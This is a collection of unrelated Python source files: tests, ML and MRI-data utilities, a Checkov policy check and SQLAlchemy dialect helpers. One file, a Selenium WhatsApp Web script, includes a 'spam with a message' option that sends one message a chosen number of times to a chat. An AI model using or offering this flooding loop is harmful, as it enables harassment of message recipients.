monkeypatch.setattr(addupgradebootentry, 'write_to_file', write_to_file_mocked()) addupgradebootentry.fix_grub_config_error(os.path.join(CUR_DIR, 'files/grub_test.wrong')) with open(os.path.join(CUR_DIR, 'files/grub_test.fixed')) as f: assert addupgradebootentry.write_to_file.content == f.read()
11570827
from django.conf.urls import url from corehq.messaging.smsbackends.apposit.views import AppositIncomingView urlpatterns = [ url(r'^in/(?P<api_key>[\w-]+)/$', AppositIncomingView.as_view(), name=AppositIncomingView.urlname), ]
11570828
import copy import importlib import sys try: from unittest import mock except ImportError: import mock import unittest2 import rollbar from rollbar.lib._async import AsyncMock from rollbar.test import BaseTest ALLOWED_PYTHON_VERSION = sys.version_info >= (3, 5) ASYNC_REPORT_ENABLED = sys.version_info >= (3, 6) @unittest2.skipUnless(ALLOWED_PYTHON_VERSION, 'ASGI implementation requires Python3.5+') class ReporterMiddlewareTest(BaseTest): default_settings = copy.deepcopy(rollbar.SETTINGS) def setUp(self): importlib.reload(rollbar) rollbar.SETTINGS = copy.deepcopy(self.default_settings) rollbar.SETTINGS['handler'] = 'async' @mock.patch('rollbar.report_exc_info') def test_should_catch_and_report_errors(self, mock_report): from rollbar.contrib.asgi.middleware import ReporterMiddleware from rollbar.lib._async import FailingTestASGIApp, run testapp = ReporterMiddleware(FailingTestASGIApp()) with self.assertRaises(RuntimeError): run(testapp({'type': 'http'}, None, None)) self.assertTrue(mock_report.called) args, kwargs = mock_report.call_args self.assertEqual(kwargs, {}) exc_type, exc_value, exc_tb = args[0] self.assertEqual(exc_type, RuntimeError) self.assertIsInstance(exc_value, RuntimeError) @mock.patch('rollbar._check_config', return_value=True) @mock.patch('rollbar.send_payload') def test_should_add_framework_name_to_payload(self, mock_send_payload, *mocks): import rollbar from rollbar.contrib.asgi.middleware import ReporterMiddleware self.assertIsNone(rollbar.BASE_DATA_HOOK) ReporterMiddleware(None) # invoke integration rollbar.report_exc_info() self.assertTrue(mock_send_payload.called) payload = mock_send_payload.call_args[0][0] self.assertIn('asgi', payload['data']['framework']) @unittest2.skipUnless(ASYNC_REPORT_ENABLED, 'Requires Python 3.6+') @mock.patch('rollbar.lib._async.report_exc_info', new_callable=AsyncMock) @mock.patch('rollbar.report_exc_info') def test_should_use_async_report_exc_info_if_default_handler( self, sync_report_exc_info, async_report_exc_info ): import rollbar from rollbar.contrib.asgi.middleware import ReporterMiddleware from rollbar.lib._async import FailingTestASGIApp, run rollbar.SETTINGS['handler'] = 'default' testapp = ReporterMiddleware(FailingTestASGIApp()) with self.assertRaises(RuntimeError): run(testapp({'type': 'http'}, None, None)) self.assertTrue(async_report_exc_info.called) self.assertFalse(sync_report_exc_info.called) @unittest2.skipUnless(ASYNC_REPORT_ENABLED, 'Requires Python 3.6+') @mock.patch('rollbar.lib._async.report_exc_info', new_callable=AsyncMock) @mock.patch('rollbar.report_exc_info') def test_should_use_async_report_exc_info_if_any_async_handler( self, sync_report_exc_info, async_report_exc_info ): import rollbar from rollbar.contrib.asgi.middleware import ReporterMiddleware from rollbar.lib._async import FailingTestASGIApp, run rollbar.SETTINGS['handler'] = 'httpx' testapp = ReporterMiddleware(FailingTestASGIApp()) with self.assertRaises(RuntimeError): run(testapp({'type': 'http'}, None, None)) self.assertTrue(async_report_exc_info.called) self.assertFalse(sync_report_exc_info.called) @unittest2.skipUnless(ASYNC_REPORT_ENABLED, 'Requires Python 3.6+') @mock.patch('logging.Logger.warning') @mock.patch('rollbar.lib._async.report_exc_info', new_callable=AsyncMock) @mock.patch('rollbar.report_exc_info') def test_should_use_sync_report_exc_info_if_non_async_handlers( self, sync_report_exc_info, async_report_exc_info, mock_log ): import rollbar from rollbar.contrib.asgi.middleware import ReporterMiddleware from rollbar.lib._async import FailingTestASGIApp, run rollbar.SETTINGS['handler'] = 'threading' testapp = ReporterMiddleware(FailingTestASGIApp()) with self.assertRaises(RuntimeError): run(testapp({'type': 'http'}, None, None)) self.assertFalse(async_report_exc_info.called) self.assertTrue(sync_report_exc_info.called) mock_log.assert_called_once_with( 'Failed to report asynchronously. Trying to report synchronously.' ) def test_should_support_http_only(self): from rollbar.contrib.asgi.middleware import ReporterMiddleware from rollbar.lib._async import FailingTestASGIApp, run testapp = ReporterMiddleware(FailingTestASGIApp()) with mock.patch('rollbar.report_exc_info') as mock_report: with self.assertRaises(RuntimeError): run(testapp({'type': 'http'}, None, None)) self.assertTrue(mock_report.called) with mock.patch('rollbar.report_exc_info') as mock_report: with self.assertRaises(RuntimeError): run(testapp({'type': 'websocket'}, None, None)) self.assertFalse(mock_report.called) def test_should_support_type_hints(self): from rollbar.contrib.asgi.types import Receive, Scope, Send self.assertDictEqual( rollbar.contrib.asgi.ReporterMiddleware.__call__.__annotations__, {'scope': Scope, 'receive': Receive, 'send': Send, 'return': None}, )
11570928
import unittest import numpy as np import kinpy as kp class TestFkIk(unittest.TestCase): def test_fkik(self): data = '<robot name="test_robot">'\ '<link name="link1" />'\ '<link name="link2" />'\ '<link name="link3" />'\ '<joint name="joint1" type="revolute">'\ '<origin xyz="1.0 0.0 0.0"/>'\ '<parent link="link1"/>'\ '<child link="link2"/>'\ '</joint>'\ '<joint name="joint2" type="revolute">'\ '<origin xyz="1.0 0.0 0.0"/>'\ '<parent link="link2"/>'\ '<child link="link3"/>'\ '</joint>'\ '</robot>' chain = kp.build_serial_chain_from_urdf(data, 'link3') th1 = np.random.rand(2) tg = chain.forward_kinematics(th1) th2 = chain.inverse_kinematics(tg) self.assertTrue(np.allclose(th1, th2, atol=1.0e-6)) if __name__ == "__main__": unittest.main()
11570932
from .mapper import ApiResponse from .model.collection import CollectionInterface __all__ = ['CreateCollectionResponse'] class CreateCollectionResponseInterface(CollectionInterface): pass class CreateCollectionResponse(ApiResponse, CreateCollectionResponseInterface): pass
11570935
from rolling_grid_search import rolling_grid_search_ML import pandas as pd import numpy as np from pandas import * from numpy import * from sklearn import svm from sklearn.model_selection import TimeSeriesSplit,ParameterGrid from sklearn.neighbors import KNeighborsRegressor from sklearn import svm data = pd.read_csv("all_data.csv",skiprows=list(range(2449,2615))) data.set_index("DATE", inplace = True) var_lst = data.columns.tolist() for var in var_lst: data[var] = data[var].astype(float) var_lst = data.columns.tolist() num_lags = 1 for var in var_lst: data[var] = data[var].astype(float) for lag in range(1,num_lags + 1): col_name = "L"+str(lag)+"."+str(var) data[col_name] = data[var].shift(-lag) data.dropna(axis=0, how='any', inplace = True) def rmse(actual,pred): import numpy as np len_lst = len(actual) e_2 = [] for i in range(0,len_lst): e_2.append((actual[i]-pred[i])**2) return (np.array(e_2).mean())**(0.5) def crit_min(score_lst): min_val = score_lst[0] min_index = 0 counter = 0 for score in score_lst: if (score < min_val): min_index = counter min_val = score counter += 1 return (min_index,min_val) knnreg = KNeighborsRegressor() param_grid = {"n_neighbors": [1,2,3,4,5],"p":[1,2,3,4,5]} #model, X, y, param_grid, cv, scoring, crit, window_size r = rolling_grid_search_ML(model = knnreg, y = DataFrame(data["US_EU"]), X = data[["L1.US_EU","L1.US_UK"]], group_size = 365, param_grid=param_grid, scoring = rmse, crit = crit_min, window_size = 7, size_hyper_sel = 30) params_lst = r['params'] actual_lst = r['actual'] pred_lst = r['pred'] import matplotlib.pyplot as plt params_df = DataFrame.from_dict(data = params_lst) params_fig = params_df.plot(kind='line', title="Change in Hyperparameters", grid=False) params_fig.set_xlabel("Group Number") params_fig.set_ylabel("Hyperparameters") plt.show() pred_df = pd.DataFrame(data=[pred_lst,actual_lst]) pred_df = pred_df.transpose() pred_df.rename(index=str, columns={0: "Prediction", 1: "Actual"}, inplace = True) pred_fig = pred_df.plot(kind='line', title="Actual and Predicted Values", grid=False) pred_fig.set_xlabel("Time") pred_fig.set_ylabel("Exchange Rates") plt.show()
11570940
from pyschema import Record, no_auto_store from pyschema.types import Text @no_auto_store() class TestRecord(Record): _namespace = "my.namespace" a = Text()
11570952
from selenium import webdriver import time PATH = 'PATH OF CHROME DRIVER LOCATED IN YOUR MACHINE' driver = webdriver.Chrome(PATH) driver.get('https://web.whatsapp.com/') print('----------------------------------------------------------------\n' '| WELCOME TO WHATSAPP AUTOMATION |\n' '----------------------------------------------------------------\n') time.sleep(10) chatting = True while chatting: time.sleep(2) print('OPTIONS :\n' '1.chat\n' '00.Quit') chat_option = input('Enter your choice : ') if chat_option == '1': select_chat = True time.sleep(2) while select_chat: print('---------------\n' '| ALL CHATS |\n' '---------------') time.sleep(2) all_chats = driver.find_elements_by_xpath('/html/body/div/div[1]/div[1]/div[3]/div/div[2]/div[1]/div/div/div') for i in range(len(all_chats)): chatname = driver.find_element_by_xpath(f'/html/body/div/div[1]/div[1]/div[3]/div/div[2]/div[1]/div/div/div[{str(i+1)}]/div/div/div[2]/div[1]/div[1]/span').text print(f' ==> {i+1} . {chatname}') print(f' ==> 00 . EXIT') option = input('\nEnter the chat index given above : ') time.sleep(2) if option != '00': driver.find_element_by_xpath(f'/html/body/div/div[1]/div[1]/div[3]/div/div[2]/div[1]/div/div/div[{str(int(option))}]').click() in_chat = True while in_chat: print('Type of messaging : \n' ' choice-1 : single message\n' ' choice-2 : spam with a message\n' ' choice-3 : BACK TO ALL CHATS') choice_in = input('Enter your choice(number) : ') if choice_in == '1': message = input('Enter a messsage : ') driver.find_element_by_xpath('/html/body/div/div[1]/div[1]/div[4]/div[1]/footer/div[1]/div[2]/div/div[2]').send_keys(f'{message} \n') elif choice_in == '2': message = input('Enter a messsage : ') number = int(input('Enter No.of messages : ')) for i in range(number): driver.find_element_by_xpath('/html/body/div/div[1]/div[1]/div[4]/div[1]/footer/div[1]/div[2]/div/div[2]').send_keys(f'{message} \n') elif choice_in == '3': driver.get('https://web.whatsapp.com/') in_chat = False else: select_chat = False else: chatting = False driver.quit()
11570964
from websockets.exceptions import ( ConnectionClosed, ConnectionClosedOK, InvalidStatusCode ) class UnsuccessfulConnection(Exception): ''' Unsuccessful connection to an endpoint (e.g., ws) ''' pass class MaximumRetriesReached(Exception): ''' Maximum retries reached while fetching an endpoint ''' pass class UnsuccessfulDatabaseInsert(Exception): ''' Unsuccessful insert to db ''' pass
11570972
import torch from torch.utils.data import DataLoader import pandas as pd from tqdm import tqdm from dataset.patch_extraction import PANDAPatchExtraction import json torch.backends.cudnn.benchmark = False def main(): tiff_dir=SETTINGS['RAW_DATA_DIR']+"train_images/" mask_dir=SETTINGS['RAW_DATA_DIR']+"train_label_masks/" df=pd.read_csv(SETTINGS["CSV_PATH"]) suspicious = pd.read_csv(SETTINGS["SUSPICIOUS_PATH"]).image_id df = df[~df.image_id.isin(suspicious)] dataset=PANDAPatchExtraction(df, tiff_dir, mask_dir, # Patch parameter patch_size=192, bg_threshold=0.95, trail_offset=[0,1/2], # Augmentation & Normalization mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225), ) dataloader=DataLoader(dataset,batch_size=1,shuffle=False,num_workers=8) result_metadata=dict() for images,coords,img_id,patch_labels,ignore_mask,best_offset in tqdm(dataloader): img_id=img_id[0] result_metadata[img_id] = best_offset.item() #print(result_metadata) with open(SETTINGS["LEVEL0_JSON_DIR"]+"Validation_mode.json","w+") as f: json.dump(result_metadata,f) import json with open("./SETTINGS.json") as f: SETTINGS=json.load(f) if __name__=="__main__": main()
11570986
from attrdict import AttrDict config = AttrDict() config.log_path = '/rebryk/kaggle/protein/logs' config.data_path = '/rebryk/kaggle/protein/dataset' config.model_path = '/rebryk/kaggle/protein/models' config.submission_path = '/rebryk/kaggle/protein/submissions' config.tensorboard_path = '/rebryk/logs' config.exp = 'test' config.model = 'resnet50' config.num_workers = 8 config.batch_size = 32 config.image_size = 512 config.lr = None config.num_epochs = None config.cycles_len = None config.lr_divs = None config.test_size = 0.1 config.k_fold = 5 config.external_data = False config.use_sampler = True config.mixed_precision = False config.checkpoint = 'stage_2_sz512_x32_f{}_06' config.n_aug_train = 0 config.n_aug_test = 8
11570987
import h5py import numpy as np from pathlib import Path import warnings """ Code to transform the original dataset into a form that has faster data IO. This is especially important for non-SSD storage. For most systems, File I/O is the bottleneck for training speed. """ def check_chunk_size(data, chunk, file): mb = 2 ** 20 # megabyte chunk_bytes = np.prod(chunk) * data.itemsize if chunk_bytes > mb: warnings.warn(f'kspace chunk size for {file} is greater than 1MB. ' f'Specified chunk size is {chunk_bytes} for chunk configuration of {chunk}' f'Please reconsider chunk size configurations. ' f'A chunk size greater than 1MB cannot utilize HDF5 caching by default.') def make_compressed_dataset(data_folder, save_dir, **save_params): data_path = Path(data_folder) files = data_path.glob('*.h5') save_path = Path(save_dir) save_path.mkdir(exist_ok=True) save_path = save_path / data_path.stem save_path.mkdir() for file in sorted(files): print(f'Processing {file}') with h5py.File(file, mode='r') as old_hf: attrs = dict(old_hf.attrs) kspace = np.asarray(old_hf['kspace']) # Chunk size should be below 1M for cache utilization. Complex data is 8 bytes. if kspace.ndim == 3: # Single-coil case chunk = (1, kspace.shape[-2] // 4, kspace.shape[-1]) # dim=-2 is always 640 for fastMRI. recons_key = 'reconstruction_esc' elif kspace.ndim == 4: chunk = (1, 1, kspace.shape[-2] // 4, kspace.shape[-1]) recons_key = 'reconstruction_rss' else: raise TypeError('Invalid dimensions of input k-space data') test_set = recons_key not in old_hf.keys() if test_set: mask = old_hf['mask'][()] attrs.update({'mask': mask}) labels = None else: labels = np.asarray(old_hf[recons_key]) check_chunk_size(kspace, chunk, file) with h5py.File(save_path / file.name, mode='x', libver='latest') as new_hf: new_hf.attrs.update(attrs) new_hf.create_dataset('kspace', data=kspace, chunks=chunk, **save_params) if not test_set: new_hf.create_dataset(recons_key, data=labels, chunks=(1, 320, 320), **save_params) def check_same(old_folder, new_folder): old_path = Path(old_folder) new_path = Path(new_folder) old_paths = list(old_path.glob('*.h5')) old_paths.sort() new_paths = list(new_path.glob('*.h5')) new_paths.sort() assert len(old_paths) == len(new_paths) for old, new in zip(old_paths, new_paths): assert old.name == new.name, 'Name is not the same.' print(f'Checking {new}') with h5py.File(old, mode='r') as old_hf, h5py.File(new, mode='r') as new_hf: assert dict(new_hf.attrs) == dict(old_hf.attrs) for key in new_hf.keys(): assert np.all(np.asarray(old_hf[key]) == np.asarray(new_hf[key])) else: print('All is well!') def make_compressed_test_dataset(data_folder, save_dir, **save_params): data_path = Path(data_folder) files = data_path.glob('*.h5') save_path = Path(save_dir) save_path.mkdir(exist_ok=True) save_path = save_path / data_path.stem save_path.mkdir() for file in sorted(files): print(f'Processing {file}') with h5py.File(file, mode='r') as old_hf: attrs = dict(old_hf.attrs) kspace = np.asarray(old_hf['kspace']) mask = old_hf['mask'][()] attrs.update({'mask': mask}) # Chunk size should be below 1M for cache utilization. Complex data is 8 bytes. if kspace.ndim == 3: # Single-coil case chunk = (1, kspace.shape[-2] // 4, kspace.shape[-1]) # dim=-2 is always 640 for fastMRI. elif kspace.ndim == 4: # Multi-coil case chunk = (1, 1, kspace.shape[-2] // 4, kspace.shape[-1]) else: raise TypeError('Invalid dimensions of input k-space data') check_chunk_size(kspace, chunk, file) with h5py.File(save_path / file.name, mode='x', libver='latest') as new_hf: new_hf.attrs.update(attrs) new_hf.create_dataset('kspace', data=kspace, chunks=chunk, **save_params) if __name__ == '__main__': # train_dir = '/media/veritas/E/fastMRI/multicoil_train' # val_dir = '/media/veritas/E/fastMRI/multicoil_val' # test_dir = '/media/veritas/E/fastMRI/singlecoil_test_v2' test_dir = '/media/veritas/E/fastMRI/singlecoil_test_v2' # challenge_dir = '/media/veritas/E/fastMRI/multicoil_challenge' data_root = '/media/veritas/D/FastMRI_' # Compressed Fast MRI Dataset data_path_ = Path(data_root) # For floating point values, I have found that gzip level 1 and 9 give almost the same compression. # I have not checked whether this is also true for complex numbers but I presume this here. # I have found that gzip with level 1 is almost the same as gzip level 9 for complex data # when used with the shuffle filter. They both reduce the data by about half. # The differences are not great enough to justify the extra computational cost of higher gzip levels. # The differences do justify using gzip over lzf, however. kwargs = dict(compression='gzip', compression_opts=1, shuffle=True, fletcher32=False) # kwargs = dict(compression='lzf', shuffle=True) # Use compression if storing on hard drive, not SSD. # make_compressed_dataset(train_dir, data_root, **kwargs) # make_compressed_dataset(val_dir, data_root, **kwargs) make_compressed_test_dataset(test_dir, data_root, **kwargs) # make_compressed_test_dataset(challenge_dir, data_root, **kwargs) # check_same(train_dir, data_path_ / 'new_singlecoil_train') # check_same(val_dir, data_path_ / 'new_singlecoil_val') # check_same(test_dir, data_path_ / 'new_singlecoil_test')
11571072
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck from checkov.common.models.enums import CheckCategories class GKENetworkPolicyEnabled(BaseResourceValueCheck): def __init__(self): name = "Ensure Network Policy is enabled on Kubernetes Engine Clusters" id = "CKV_GCP_12" supported_resources = ['google_container_cluster'] categories = [CheckCategories.KUBERNETES] super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) def get_inspected_key(self): """ Looks for monitoring configuration on google_container_cluster: https://www.terraform.io/docs/providers/google/r/container_cluster.html :param conf: google_container_cluster configuration :return: <CheckResult> """ return 'network_policy/[0]/enabled' check = GKENetworkPolicyEnabled()
11571113
import torch from registry import registry from eval_settings.eval_setting_base import EvalSetting, StandardDataset, accuracy_topk from eval_settings.eval_setting_subsample import class_sublist_1_8 registry.add_eval_setting( EvalSetting( name = 'val', dataset = StandardDataset(name='val'), size = 50000, ) ) def accuracy_topk_subselected(logits, targets): targets = torch.tensor([class_sublist_1_8.index(x) for x in targets]) return accuracy_topk(logits, targets) idx_subsample_list = [range(x*50, (x+1)*50) for x in class_sublist_1_8] idx_subsample_list = sorted([item for sublist in idx_subsample_list for item in sublist]) registry.add_eval_setting( EvalSetting( name = 'val_subsampled_class_1_8', dataset = StandardDataset(name='val'), size = 6250, class_sublist = class_sublist_1_8, metrics_fn = accuracy_topk_subselected, idx_subsample_list = idx_subsample_list, ) )
11571130
def main(): if a := 1: print(a) if c := "": print(c) if d := b"": print(d) if e := "Hello": print(e) if f := b"Goodbye": print(f) if g := 1.0: print(g) if h := 1j: print(h) if i := 0.0: print(i) if j := 0j: print(j) if k := []: print(k) if l := [1, 2, 3]: print(l) if m := True: print(m) if n := False: print(n) if o := (): print(o) if p := (1, 2, 3): print(p) if q := set(): print(q) if r := {1, 2, 3}: print(r) if s := {}: print(s) if t := {1: 2}: print(t) if __name__ == '__main__': main()
11571146
from optimus.tests.base import TestBase class TestLoadPandas(TestBase): def test_json(self): df = self.load_dataframe("examples/data/foo.json", type="json", multiline=True) self.assertEqual(df.rows.count(), 19) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_json_less_rows(self): df = self.load_dataframe("examples/data/foo.json", type="json", n_rows=13) self.assertEqual(df.rows.count(), 13) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_json_more_rows(self): df = self.load_dataframe("examples/data/foo.json", type="json", n_rows=50) self.assertLess(df.rows.count(), 50) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_xml(self): df = self.load_dataframe("examples/data/foo.xml", type="xml") self.assertEqual(df.rows.count(), 19) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_xml_less_rows(self): df = self.load_dataframe("examples/data/foo.xml", type="xml", n_rows=13) self.assertEqual(df.rows.count(), 13) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_xml_more_rows(self): df = self.load_dataframe("examples/data/foo.xml", type="xml", n_rows=50) self.assertLess(df.rows.count(), 50) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_parquet(self): df = self.load_dataframe("examples/data/foo.parquet", type="parquet") self.assertEqual(df.rows.count(), 19) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_parquet_less_rows(self): df = self.load_dataframe("examples/data/foo.parquet", type="parquet", n_rows=13) self.assertEqual(df.rows.count(), 13) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_parquet_more_rows(self): df = self.load_dataframe("examples/data/foo.parquet", type="parquet", n_rows=50) self.assertLess(df.rows.count(), 50) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_avro(self): df = self.load_dataframe("examples/data/foo.avro", type="avro") self.assertEqual(df.rows.count(), 19) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_avro_less_rows(self): df = self.load_dataframe("examples/data/foo.avro", type="avro", n_rows=13) self.assertEqual(df.rows.count(), 13) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_avro_more_rows(self): df = self.load_dataframe("examples/data/foo.avro", type="avro", n_rows=50) self.assertLess(df.rows.count(), 50) self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId", "product", "price", "birth", "dummyCol"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_tsv(self): df = self.load_dataframe("examples/data/foo.tsv", type="tsv") self.assertEqual(df.rows.count(), 5) self.assertEqual(df.cols.names(), ["Sepal length", "Sepal width", "Petal length", "Petal width", "Species"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_tsv_less_rows(self): df = self.load_dataframe("examples/data/foo.tsv", type="tsv", n_rows=3) self.assertEqual(df.rows.count(), 3) self.assertEqual(df.cols.names(), ["Sepal length", "Sepal width", "Petal length", "Petal width", "Species"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_tsv_more_rows(self): df = self.load_dataframe("examples/data/foo.tsv", type="tsv", n_rows=50) self.assertLess(df.rows.count(), 50) self.assertEqual(df.cols.names(), ["Sepal length", "Sepal width", "Petal length", "Petal width", "Species"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_xls(self): df = self.load_dataframe("examples/data/titanic3.xls", type="excel") self.assertEqual(df.rows.count(), 1309) self.assertEqual(df.cols.names(), ["pclass", "survived", "name", "sex", "age", "sibsp", "parch", "ticket", "fare", "cabin", "embarked", "boat", "body", "home.dest"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_xls_less_rows(self): df = self.load_dataframe("examples/data/titanic3.xls", type="excel", n_rows=13) self.assertEqual(df.rows.count(), 13) self.assertEqual(df.cols.names(), ["pclass", "survived", "name", "sex", "age", "sibsp", "parch", "ticket", "fare", "cabin", "embarked", "boat", "body", "home.dest"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) def test_xls_more_rows(self): df = self.load_dataframe("examples/data/titanic3.xls", type="excel", n_rows=50) self.assertLess(df.rows.count(), 5000) self.assertEqual(df.cols.names(), ["pclass", "survived", "name", "sex", "age", "sibsp", "parch", "ticket", "fare", "cabin", "embarked", "boat", "body", "home.dest"]) if "n_partitions" in self.config: self.assertEqual(self.config["n_partitions"], df.partitions()) class TestLoadDask(TestLoadPandas): config = {'engine': 'dask'} class TestLoadPartitionDask(TestLoadPandas): config = {'engine': 'dask', 'n_partitions': 2} try: import cudf # pyright: reportMissingImports=false except: pass else: class TestLoadCUDF(TestLoadPandas): config = {'engine': 'cudf'} try: import dask_cudf # pyright: reportMissingImports=false except: pass else: class TestLoadDC(TestLoadPandas): config = {'engine': 'dask_cudf'} try: import dask_cudf # pyright: reportMissingImports=false except: pass else: class TestLoadPartitionDC(TestLoadPandas): config = {'engine': 'dask_cudf', 'n_partitions': 2} try: import pyspark except: pass else: class TestLoadSpark(TestLoadPandas): config = {'engine': 'spark'} try: import vaex except: pass else: class TestLoadVaex(TestLoadPandas): config = {'engine': 'vaex'}
11571147
from __future__ import absolute_import from sqlalchemy import MetaData import six from ..db import db class DialectOperations(object): dialect_map = {} option_defaults = None def __init__(self, engine, bind_name, options=None): # this engine is tied to a particular "bind" use it instead of db.engine self.engine = engine self.bind_name = bind_name self.assign_options(options or {}) def assign_options(self, option_pairs): if not self.option_defaults: return for option_key in self.option_defaults.keys(): full_key = '{}.{}'.format(self.dialect_name, option_key) attr_name = 'opt_{}'.format(option_key) default_opt_value = self.option_defaults[option_key] opt_value = option_pairs.get(full_key, default_opt_value) setattr(self, attr_name, opt_value) def execute_sql(self, statements): for sql in statements: self.engine.execute(sql) def create_all(self): self.create_schemas() db.create_all(bind=self.bind_name) def create_schemas(self): pass @classmethod def create_for(cls, engine, bind_name, options): dialect_name = engine.dialect.name if dialect_name in cls.dialect_map: cls = cls.dialect_map[dialect_name] return cls(engine, bind_name, options) else: raise Exception('DialectOperations does not yet support the "{}" database.' .format(dialect_name)) def on_connect(self, dbapi_connection, connection_record): pass class PostgreSQLOps(DialectOperations): dialect_name = 'postgresql' option_defaults = {'schemas': ('public',)} def create_schemas(self): sql = [] connection_user = self.engine.url.username for schema in self.opt_schemas: sql.extend([ f'CREATE SCHEMA IF NOT EXISTS "{schema}" AUTHORIZATION "{connection_user}";', f'GRANT ALL ON SCHEMA "{schema}" TO "{connection_user}";', ]) self.execute_sql(sql) def create_all(self): self.create_schemas() super().create_all() def drop_all(self): sql = [] for schema in self.opt_schemas: sql.extend([ 'DROP SCHEMA IF EXISTS "{}" CASCADE;'.format(schema), ]) self.execute_sql(sql) DialectOperations.dialect_map['postgresql'] = PostgreSQLOps class SQLiteOps(DialectOperations): dialect_name = 'sqlite' def on_connect(self, dbapi_connection, connection_record): # Want SQLite to use foreign keys # todo: if this becomes undesirable for some reason, we can make it an option. cursor = dbapi_connection.cursor() cursor.execute("PRAGMA foreign_keys=ON") cursor.close() def drop_all(self): # drop the views sql = "select name from sqlite_master where type='view'" rows = self.engine.execute(sql) drop_sql = ['drop view {0}'.format(record['name']) for record in rows] self.execute_sql(drop_sql) # Find all the tables using metadata and reflection. Use a custom MetaData instance to # avoid contaminating the metadata associated with our entities. md = MetaData(bind=self.engine) md.reflect() for table in reversed(md.sorted_tables): try: self.engine.execute('drop table {}'.format(table.name)) except Exception as e: if 'no such table' not in str(e): raise DialectOperations.dialect_map['sqlite'] = SQLiteOps class MicrosoftSQLOps(DialectOperations): dialect_name = 'mssql' option_defaults = {'schemas': tuple()} def drop_all(self): # generate drops for all objects, being careful of the schema the object belongs to mapping = { 'P': 'drop procedure [{schema_name}].[{name}]', 'C': 'alter table [{schema_name}].[{parent_name}] drop constraint [{name}]', ('FN', 'IF', 'TF'): 'drop function [{schema_name}].[{name}]', 'V': 'drop view [{schema_name}].[{name}]', 'F': 'alter table [{schema_name}].[{parent_name}] drop constraint [{name}]', 'U': 'drop table [{schema_name}].[{name}]', } delete_sql = [] for type, drop_sql in six.iteritems(mapping): sql = 'select name, object_name( parent_object_id ) as parent_name '\ ', OBJECT_SCHEMA_NAME(object_id) as schema_name '\ 'from sys.objects where type in (\'{}\')'.format("', '".join(type)) rows = self.engine.execute(sql) for row in rows: delete_sql.append(drop_sql.format(**dict(row))) # removing schemas can be tricky. SQL Server 2016+ supports DROP SCHEMA IF EXISTS ... # syntax, but we need to support earlier versions. Technically, an IF EXISTS(...) DROP # SCHEMA should work, but testing shows the drop never happens when executed in this # fashion. So, query sys.schemas directly, and drop any schemas that we are interested # in (according to the bind opts) schema_sql = 'select name from sys.schemas' rows = self.engine.execute(schema_sql) for row in rows: if row.name in self.opt_schemas: delete_sql.append('drop schema {}'.format(row.name)) # all drops should be in order, execute them all self.execute_sql(delete_sql) def create_schemas(self): sql = [] for schema in self.opt_schemas: # MSSQL has to run CREATE SCHEMA as its own batch # So, we can't use an IF NOT EXISTS at the same time. Test first, then create. existing = self.engine.execute( "SELECT COUNT(*) FROM sys.schemas WHERE name = N'{}'".format(schema) ).scalar() if not existing: sql.extend([ 'CREATE SCHEMA {}'.format(schema), ]) self.execute_sql(sql) DialectOperations.dialect_map['mssql'] = MicrosoftSQLOps
11571148
